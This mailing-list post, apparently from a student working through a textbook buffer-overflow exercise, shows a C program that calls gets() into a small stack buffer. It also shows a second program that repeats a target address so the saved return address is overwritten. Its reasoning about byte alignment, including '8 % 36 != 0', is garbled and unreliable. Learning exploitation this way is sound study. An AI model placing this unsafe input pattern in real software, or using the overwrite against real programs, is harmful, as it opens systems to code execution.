Hello all, thank you for your responses!
I finally figured out the problem. It was rather interesting so I figured that
I would share in more detail.
Firstly the "program" to be exploited:
****************************************
#include <stdio.h>
void return_input(void){
char array[30];
gets (array);
printf("%s\n", array);
}
main()
{
return_input();
return 0;
}
********************************************
Secondly the new code to produce the ASCII characters of the address to be
jumped to:
********************************************
#include <stdio.h>
main()
{
int i=0;
char stuffing[40];
for (i=0; i<=36; i+=4)
*(long *) &stuffing[i] = 0x84050804;
puts(stuffing);
}
********************************************
The interesting thing is that the address being placed in stuffing is not the
address that I would like to jump to; that is 0x08048405. The reason for this
is the buffer size. When I disassembled the function it had a buffer size of
0x24 (in the book it was 0x20) 0x24 in decimal is 36. So, when I was writing to
the EIP I was putting the last half of the address onto the EIP 4 bytes (I
believe, it's been a while since Computer Organization) and then the second
half. this is because of 36 not being cleanly divisble by 8 (i.e. 8 % 36 != 0).
I, in my relative 'n00b-ness' found this rather interesting and was elated when
I found out the source of my troubles.
Thanks for all who responded!
~Peace,
Zach
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!
http://www.cenzic.com/c/2020
------------------------------------------------------------------------
